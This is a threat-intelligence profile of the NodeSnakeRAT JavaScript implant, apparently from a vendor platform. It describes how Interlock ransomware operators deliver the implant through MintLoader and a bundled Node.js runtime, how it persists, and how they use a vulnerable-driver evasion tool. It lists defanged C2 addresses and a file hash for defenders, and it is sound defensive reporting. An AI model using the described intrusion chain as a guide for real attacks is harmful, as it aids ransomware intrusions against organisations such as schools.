NodeSnakeRAT
NodeSnakeRAT is a JavaScript-based remote access implant associated with Interlock ransomware intrusions. It has been described as an early version of the malware tracked by Mandiant as CORNFLAKE and by Quorum as NodeSnakeRAT.B. In reported Interlock attack chains, MintLoader delivers a legitimate Node.js runtime (node.exe) that executes the malicious JavaScript payload, after which NodeSnakeRAT is used to establish access and support lateral movement across victim networks. Fortinet reporting states that Interlock has used this implant in attacks against education-sector organizations in the United States, the United Kingdom, and in at least one reported North American education intrusion.
Observed behavior includes execution via a bundled legitimate Node.js runtime, persistence through an autorun entry named ChromeUpdater, and use of embedded command-and-control infrastructure. Reported NodeSnakeRAT/CORNFLAKE C2 indicators include 216[.]245.184.181, 212[.]237.217.182, 168[.]119.96.41, and several trycloudflare.com subdomains. In one documented case, the initial JavaScript payload was j1wp4vw8.log with SHA1 63FD5E0811C0BCC7DF9FC3D712F39F829A8D6FF0. The malware was delivered in a zip archive named download.zip containing node.exe, following a PowerShell download cradle from 138[.]199[.]156[.]22:8080/<time_since_epoch>. The content directly links NodeSnakeRAT to Interlock operations involving post-compromise movement, with subsequent activity in those intrusions including use of valid accounts, living-off-the-land techniques, data exfiltration, and eventual ransomware deployment on Windows endpoints and Nutanix environments.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Interlock ... concealed ... through the custom Hotta Killer evasion tool, which harnesses a zero-day flaw in the legitimate gaming anti-cheat driver GameDriverx64.sys, tracked as CVE-2025-61155, as part of a Bring Your Own Vulnerable Driver attack. ... kernel termination of security software prior to encryption activities.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...deploy the MintLoader payload that executed the NodeSnakeRAT implant for lateral network movement...
Techniques & procedures
1 distinct technique documented for this family, organized by ATT&CK tactic.
Command and Control
1 technique"deploy the MintLoader payload that executed the NodeSnakeRAT implant"
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A remote access trojan (implant) used for lateral movement within victim networks as part of Interlock’s intrusion chain prior to ransomware delivery.
JavaScript-based implant/RAT used to support initial access and enable lateral movement within victim networks.
Node.js/JavaScript-based implant used as an early-stage foothold and payload dropper; establishes persistence (e.g., autorun 'ChromeUpdater') and drops/executes additional payloads including Interlock RAT across the intrusion.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.